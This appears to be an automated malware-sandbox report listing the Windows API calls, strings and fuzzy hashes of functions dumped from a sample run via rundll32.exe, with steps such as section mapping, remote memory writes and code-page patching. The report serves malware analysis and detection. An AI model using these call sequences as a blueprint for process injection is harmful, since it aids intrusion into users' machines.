Opcode Fuzzy Hash: 61025f7c9baaf5c3bee269bcfa59e4aca4133a68d0e57653d8166c36a1359c48
Instruction Fuzzy Hash: D3312932805108EFCF129F99DC40DDEBFB9FF88310B05455AF919A6161C7719A91EF91

Uniqueness

Uniqueness Score: -1.00%

Function 009CF57B, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009CF5C6
memset.NTDLL ref: 009CF5DD
memset.NTDLL ref: 009CF5F4
memset.NTDLL ref: 009CF60C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ea35a04aac5c149d9816084ea242fe1259cff4bc8b99724ad14c543f00be55ed
Instruction ID: 51b0586b14c9e3a146cbf330eb8bbb20fe09f264829429e27541772feee91d64
Opcode Fuzzy Hash: ea35a04aac5c149d9816084ea242fe1259cff4bc8b99724ad14c543f00be55ed
Instruction Fuzzy Hash: 2E21C27290090DBBCB205F50DD90F657B2AFF08340745012DFA4546961D772F8B9CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009B7D07, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,009C1117), ref: 009B7D13

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Part of subcall function 009D64DE: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,009B7D41,00000000,00000001,00000001,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60), ref: 009D64EC
Part of subcall function 009D64DE: StrChrA.SHLWAPI(00000000,0000003F,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,009C1117,00000008,?), ref: 009D64F6

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 009B7D71
lstrcpy.KERNEL32(00000000,00000000), ref: 009B7D81
lstrcpy.KERNEL32(00000000,00000000), ref: 009B7D8D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: d92e89cce261a713064cb6905ff56b242dd2f4f33ce0ed0d33641970b6fddb25
Instruction ID: ed1013abc8b3309badaaf91216f3543060754adb46c45020fc0c19949757ebaf
Opcode Fuzzy Hash: d92e89cce261a713064cb6905ff56b242dd2f4f33ce0ed0d33641970b6fddb25
Instruction Fuzzy Hash: 3321CD72908219EFCB125FA4CC44FEBBFACAFD6390F048096F9049B252DB35D90497A0

Uniqueness

Uniqueness Score: -1.00%

Function 009B8E40, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009B8E74
memset.NTDLL ref: 009B8E8B
memset.NTDLL ref: 009B8EA2
memset.NTDLL ref: 009B8EBA

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction ID: 1839da8ba2ed1de81fc0906437c43963ae1ba6033a38fcb46211123e214d4714
Opcode Fuzzy Hash: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction Fuzzy Hash: 55118C7290090ABBCB106FA0ED41EA7BB6CFF0D354B490119F94495812DB72F9B5DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 009CA587, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,747C81D0,009D4BD7,612E002F,00000000), ref: 009CA593
lstrlen.KERNEL32(?), ref: 009CA59B

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

lstrcpy.KERNEL32(00000000,?), ref: 009CA5B2
lstrcat.KERNEL32(00000000,?), ref: 009CA5BD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 9c3b2554bc5280c52d149eb5970ab79d13e7fa08958a2145c21544e9b98e7d6d
Instruction ID: 98403c0598ff77c91d6fc01480dc605d28663a3ce26dc18606ff3743d919f4ba
Opcode Fuzzy Hash: 9c3b2554bc5280c52d149eb5970ab79d13e7fa08958a2145c21544e9b98e7d6d
Instruction Fuzzy Hash: A3E09273819621AB87125BA4EC08C8FBBA9FF883607048816F55083120CB31C918DBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6352 Parent PID: 6224 rundll32.exeCOMMON

Executed Functions

Function 00CA7AFF, Relevance: 47.6, APIs: 25, Strings: 2, Instructions: 317memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(00CBE268), ref: 00CA7B1D

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

memset.NTDLL ref: 00CA7B4E
RtlInitializeCriticalSection.NTDLL(07D18D20), ref: 00CA7B5F

Part of subcall function 00CAB1E7: RtlInitializeCriticalSection.NTDLL(00CBE240), ref: 00CAB20B
Part of subcall function 00CAB1E7: RtlInitializeCriticalSection.NTDLL(00CBE220), ref: 00CAB221
Part of subcall function 00CAB1E7: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CAB232
Part of subcall function 00CAB1E7: GetModuleHandleA.KERNEL32(00CBF01D), ref: 00CAB25F

Part of subcall function 00CA1060: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 00CA107A

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 00CA7B88
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CA7B99
CloseHandle.KERNEL32(000003F4), ref: 00CA7BAD
GetUserNameA.ADVAPI32(00000000,?), ref: 00CA7BF6
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA7C09
GetUserNameA.ADVAPI32(00000000,?), ref: 00CA7C1E
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 00CA7C4E
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 00CA7C63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CA7C6D
CloseHandle.KERNEL32(00000000), ref: 00CA7C77
GetShellWindow.USER32 ref: 00CA7C92
GetWindowThreadProcessId.USER32(00000000), ref: 00CA7C99
CreateEventA.KERNEL32(00CBE0D4,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 00CA7D28
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 00CA7D52
OpenEventA.KERNEL32(00100000,00000000,07D189B8), ref: 00CA7D7A
CreateEventA.KERNEL32(00CBE0D4,00000001,00000000,07D189B8), ref: 00CA7D8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CA7D93
GetLastError.KERNEL32(00CB0120,00CBE04C,00CBE050), ref: 00CA7E19
LoadLibraryA.KERNEL32(ADVAPI32.DLL,00CB0120,00CBE04C,00CBE050), ref: 00CA7E2D
SetEvent.KERNEL32(?,00CA046A,00000000,00000000), ref: 00CA7EA6
RtlAllocateHeap.NTDLL(00000000,00000052,00CA046A), ref: 00CA7EBB
wsprintfA.USER32 ref: 00CA7EEB

Strings

0123456789ABCDEF, xrefs: 00CA7B66
ADVAPI32.DLL, xrefs: 00CA7E28

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 204107308-803475220
Opcode ID: b5ea05be7cb5db46eaaf7730658277d00cbab447f6837965336748e2bd2aec35
Instruction ID: 0beeb4f8bd15656d0b5f7e3f95f2a8d4e114d25b93e432a157565aa0e26290b3
Opcode Fuzzy Hash: b5ea05be7cb5db46eaaf7730658277d00cbab447f6837965336748e2bd2aec35
Instruction Fuzzy Hash: 38B1C1705083069FC720EF65EC44B6E7BE8FB46B18F100A2EF556C3260DB70A949DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CB16A5, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00CBE0D8,00000000), ref: 00CB16D3
StrRChrA.SHLWAPI(07D185A8,00000000,0000005C,00000000,00000001,00000000,00CBE0B4,00000000,?), ref: 00CB16E8
_strupr.NTDLL ref: 00CB16FE
lstrlen.KERNEL32(07D185A8), ref: 00CB1706
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00CBE0B4,00000000,?), ref: 00CB1786
RtlAddVectoredExceptionHandler.NTDLL(00000000,00CA46B0), ref: 00CB17AD
GetLastError.KERNEL32(?), ref: 00CB17C7
RtlRemoveVectoredExceptionHandler.NTDLL(00D005B8), ref: 00CB17DD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
String ID:
API String ID: 1098824789-0
Opcode ID: b5b341d6629166a27f2fc77cddab551a3db9eec46f7131fd753bd43c48d3ac18
Instruction ID: e13c8f0936f07a60d2c6467ddfdccc39f3e26df2546196d71f9e7c0d35ffdebd
Opcode Fuzzy Hash: b5b341d6629166a27f2fc77cddab551a3db9eec46f7131fd753bd43c48d3ac18
Instruction Fuzzy Hash: 7B313D729042249FDB10BFB8BC94BEE77E8A705B10F490639FD11E3191DEB44E449B61

Uniqueness

Uniqueness Score: -1.00%

Function 00C9ACD5, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 00C9AD1C
NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 00C9AD2F
NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 00C9AD4B

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 00C9AD68
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00C9AD75
NtClose.NTDLL(00000001), ref: 00C9AD87
NtClose.NTDLL(00000000), ref: 00C9AD91

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 815ad0288cd6ba45d39b03cef6b44252f149a0de023f36ad415e1f2c9327cc8d
Instruction ID: 642edaee713bafbb89407369bf81869cb0ff581698a70f1a0aa9ea01a44504fd
Opcode Fuzzy Hash: 815ad0288cd6ba45d39b03cef6b44252f149a0de023f36ad415e1f2c9327cc8d
Instruction Fuzzy Hash: 5D21E4B2900218BFDF01AFA5DC45ADEBFBDEF08780F104166FA00E6120D7719A45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7579, Relevance: 9.2, APIs: 6, Instructions: 234nativeCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(-00000040,00CA684B,00000800,00000000,00000000,?,00000B54), ref: 00CA77BB

Part of subcall function 00CA45CA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,00C91440,?,?,?,?,00CA7689,?,?,00000000,?,00000B54), ref: 00CA45EF
Part of subcall function 00CA45CA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00CA4611
Part of subcall function 00CA45CA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00CA4627
Part of subcall function 00CA45CA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00CA463D
Part of subcall function 00CA45CA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00CA4653
Part of subcall function 00CA45CA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00CA4669

Part of subcall function 00CB47A1: NtMapViewOfSection.NTDLL(00000000,000000FF,00C9E084,00000000,00000000,00C9E084,?,00000002,00000000,?,?,00000000,00C9E084,000000FF,?), ref: 00CB47CF

Part of subcall function 00C976AC: memcpy.NTDLL(?,?,?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000B54), ref: 00C97712
Part of subcall function 00C976AC: memcpy.NTDLL(?,?,?), ref: 00C97771

memcpy.NTDLL(?,?,?,?,00C91440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 00CA76E8
memcpy.NTDLL(00000018,?,00000018,?,00C91440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 00CA7734
NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000B54), ref: 00CA77F9
NtClose.NTDLL(00000000,?,00000B54), ref: 00CA7820
memset.NTDLL ref: 00CA783B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressProcmemcpy$SectionView$CloseHandleModuleUnmapmemset
String ID:
API String ID: 4028138328-0
Opcode ID: 42b7a1413b0c5b70399902e56e535a4b593ef01f10992e0ae21820772e940146
Instruction ID: 98fdbd8ff1a9e4b77f24c2d5c5de82bd34e9d56c66f8dbdf686f02fbcf54ccc4
Opcode Fuzzy Hash: 42b7a1413b0c5b70399902e56e535a4b593ef01f10992e0ae21820772e940146
Instruction Fuzzy Hash: 2A913B7190420AEFCF11DF98CD84BAEBBB4FF09308F144669E825E7261D774AA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A027, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C9A052
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00C9A05F
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00C9A0EB
GetModuleHandleA.KERNEL32(00000000), ref: 00C9A0F6
RtlImageNtHeader.NTDLL(00000000), ref: 00C9A0FF
RtlExitUserThread.NTDLL(00000000), ref: 00C9A114

Part of subcall function 00CA8B88: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C9A08D,?), ref: 00CA8B90
Part of subcall function 00CA8B88: GetVersion.KERNEL32 ref: 00CA8B9F
Part of subcall function 00CA8B88: GetCurrentProcessId.KERNEL32 ref: 00CA8BAE
Part of subcall function 00CA8B88: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00CA8BCB

Part of subcall function 00C98CA2: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00C98CF4
Part of subcall function 00C98CA2: memcpy.NTDLL(?,?,?,?,?,?), ref: 00C98D85
Part of subcall function 00C98CA2: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C98DA0

Part of subcall function 00C93CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00CAF65A), ref: 00C93CCA

Part of subcall function 00CA33D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00C94655,00000000), ref: 00CA33EE
Part of subcall function 00CA33D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,00C94655,00000000), ref: 00CA33FF
Part of subcall function 00CA33D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00C94655,00000000), ref: 00CA3412

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 1973333951-0
Opcode ID: 3f09aaff61875fa48df7202ab26e3efad14031254798e7ef3f6aa51fbfbb5586
Instruction ID: 65fa67d783ac540175ba5c830d1ea31ee4dfeddde77b809934a7c5fd23192827
Opcode Fuzzy Hash: 3f09aaff61875fa48df7202ab26e3efad14031254798e7ef3f6aa51fbfbb5586
Instruction Fuzzy Hash: 9931D432900214EFCF21EF74EC89BAEBBB8EB41754F140229F512E7150EA708E48D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9E010, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 00C9E06D

Part of subcall function 00CB47A1: NtMapViewOfSection.NTDLL(00000000,000000FF,00C9E084,00000000,00000000,00C9E084,?,00000002,00000000,?,?,00000000,00C9E084,000000FF,?), ref: 00CB47CF

memset.NTDLL ref: 00C9E091

Strings

@, xrefs: 00C9E05D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: d4b1298c01fb4ac9fb96f34190785aca84eb350c347e04818a77a1ba4a29845e
Instruction ID: 0384b1806bf7f7a261a26bd602d282d7a62dbad6d4c7974b16e02f61ca0c0208
Opcode Fuzzy Hash: d4b1298c01fb4ac9fb96f34190785aca84eb350c347e04818a77a1ba4a29845e
Instruction Fuzzy Hash: 45213BB6D0020DAFDF10DFA9C8849EEFBB9FB48354F10452AE515F3250D7709A449B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6CBC, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00CA6CE1
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00CA6CFD

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

Part of subcall function 00CAAC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00CAACBD
Part of subcall function 00CAAC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00CA6D3E,00000000,00000000,00000028,00000100), ref: 00CAACDF

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00CA6E67

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: aa51f365661ad541829a7f1d5b7fedd29f6d80f4f65bcc24abf0bfa52a59e1b4
Instruction ID: d1647d0a07dd0a82c5246ef05e5624ae8e093fafaf0c281d7151118016133bef
Opcode Fuzzy Hash: aa51f365661ad541829a7f1d5b7fedd29f6d80f4f65bcc24abf0bfa52a59e1b4
Instruction Fuzzy Hash: 4A614B75A0020AAFDF15DFA8C880BAEBBB4FF09708F044558E919E7251D770EA55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C97E14, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C97E28
GetProcAddress.KERNEL32(6F57775A), ref: 00C97E50
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 00C97E6E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: a38f2f9594a8a4d4a711659fb2b391d5a5952bb8ae9fd40b795a03f1c03395da
Instruction ID: 56ca4c7fce61190c000d8609c131f980801b43a25333b29f1af02765304323ec
Opcode Fuzzy Hash: a38f2f9594a8a4d4a711659fb2b391d5a5952bb8ae9fd40b795a03f1c03395da
Instruction Fuzzy Hash: 79115E71A15219AFEF04DB94DC09FAD77BDBB45B04F044164E909EB291D770ED05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C99DAC, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00CB29D7,00000000,00000000,00CB29D7,00003000,00000040), ref: 00C99DDD
RtlNtStatusToDosError.NTDLL(00000000), ref: 00C99DE4
SetLastError.KERNEL32(00000000), ref: 00C99DEB

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: 566ab882ce3fc9da49ecc5e4ef06698caacecaa4a8a330ab58b49f8564426dbb
Instruction ID: ec00abbe29aa2a700907572fb2c715a5bf275f079d64335e60fbb3dca3c34176
Opcode Fuzzy Hash: 566ab882ce3fc9da49ecc5e4ef06698caacecaa4a8a330ab58b49f8564426dbb
Instruction Fuzzy Hash: 6FF0FEB1521309FBEF05CB98DD4ABAE77BCEB14309F104148A605A6180EBB4AB14DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C937E7, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,00CB2A79,00000000,?,00CB2A79,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 00C93805
RtlNtStatusToDosError.NTDLL(C0000002), ref: 00C93814
SetLastError.KERNEL32(00000000,?,00CB2A79,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 00C9381B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Error$LastMemoryStatusVirtualWrite
String ID:
API String ID: 1089604434-0
Opcode ID: 6142ebade88f46e7d5556e3f716139f496fd27c9c81a914f9775acef843399de
Instruction ID: 9790fdf778a72d28eef444df4329f06051326be67161678f42bfaff627c0c1a6
Opcode Fuzzy Hash: 6142ebade88f46e7d5556e3f716139f496fd27c9c81a914f9775acef843399de
Instruction Fuzzy Hash: 70E0127250025AABCF115FD99C08F9F7B5DBB08750B004021BE01C2120D731D921E7F4

Uniqueness

Uniqueness Score: -1.00%

Function 00CAAC94, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00CAACBD
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00CA6D3E,00000000,00000000,00000028,00000100), ref: 00CAACDF

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: da23990db2b9adeab46d6d0333b1852a1abde6702aa9966b3672652e5226aaad
Instruction ID: c5f80a841420fa1286ecf85b8e431192a64a6d3459edf2a32ade40fd7687ca8f
Opcode Fuzzy Hash: da23990db2b9adeab46d6d0333b1852a1abde6702aa9966b3672652e5226aaad
Instruction Fuzzy Hash: 10F0447250010AFFDB128F8AEC44EAEBBBAFB95754B14411AF500D3230D771EA52EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00CB47A1, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,00C9E084,00000000,00000000,00C9E084,?,00000002,00000000,?,?,00000000,00C9E084,000000FF,?), ref: 00CB47CF

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction ID: 5c6f01293fe3de7486253d21d109193ca8c974e03eab42e3247f0e60c4206e2a
Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction Fuzzy Hash: 9EF0FEB690020CBFDB119FA5CC85CDFBBBDEB44345F108829F542E1451D6319E18DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CACD7A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00CBE240), ref: 00CACD91

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 946dc17dc1614bd7419d42a08f7f57dcd036f0dc152c473e881fde3d8f5a8afb
Instruction ID: d550ba8d26796afb75756fb38404ebfa08793e56b2e4985538cfec76c55f69c2
Opcode Fuzzy Hash: 946dc17dc1614bd7419d42a08f7f57dcd036f0dc152c473e881fde3d8f5a8afb
Instruction Fuzzy Hash: 89F05E75B0012A9FCB20DF55CC84EDBBBB9EB16758B504125E901DB260D330ED05DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00C91000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB5277: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275), ref: 00CB529C
Part of subcall function 00CB5277: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CB52A4
Part of subcall function 00CB5277: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CB52BB
Part of subcall function 00CB5277: VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?), ref: 00CB52E0

GetLastError.KERNEL32(00000000,00000004,00CBD518,00000000,?,00000000,00000002,00CBA568,0000001C,00CA5176,00000002,?,00000001,00000000,00CBD514,00000000), ref: 00C91159

Part of subcall function 00CB24E0: lstrlen.KERNEL32(6AD68BFC,00C9619F,?,00C9619F,00000004), ref: 00CB2518
Part of subcall function 00CB24E0: lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 00CB252F
Part of subcall function 00CB24E0: StrChrA.SHLWAPI(00000000,0000002E,?,00C9619F,00000004), ref: 00CB2538
Part of subcall function 00CB24E0: GetModuleHandleA.KERNEL32(00000000,?,00C9619F,00000004), ref: 00CB2556

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,00CBD518,00000000,?), ref: 00C910D7
VirtualProtect.KERNELBASE(00000000,00000004,00CBD518,00CBD518,?,00000004,00000000,00000004,00CBD518,00000000,?,00000000,00000002,00CBA568,0000001C,00CA5176), ref: 00C910F2
RtlEnterCriticalSection.NTDLL(00CBE240), ref: 00C91116
RtlLeaveCriticalSection.NTDLL(00CBE240), ref: 00C91134

Part of subcall function 00CB5277: SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CB52E9

Strings

, xrefs: 00C910C6

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: 59c7f1ed9b944a36fcffca2d28a7d4267b2a2bb5b50b8cf571c3fc8ad874cd5d
Instruction ID: f365bbaa8345e32c749975690d3610e18cc379bebf1d56ce5e91e5a3120fb4d0
Opcode Fuzzy Hash: 59c7f1ed9b944a36fcffca2d28a7d4267b2a2bb5b50b8cf571c3fc8ad874cd5d
Instruction Fuzzy Hash: 87414D71900606AFDB14DF59C849BDDBBB8FF04310F088219ED25AB290D770EA50CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9D35, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA6CBC: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00CA6CE1
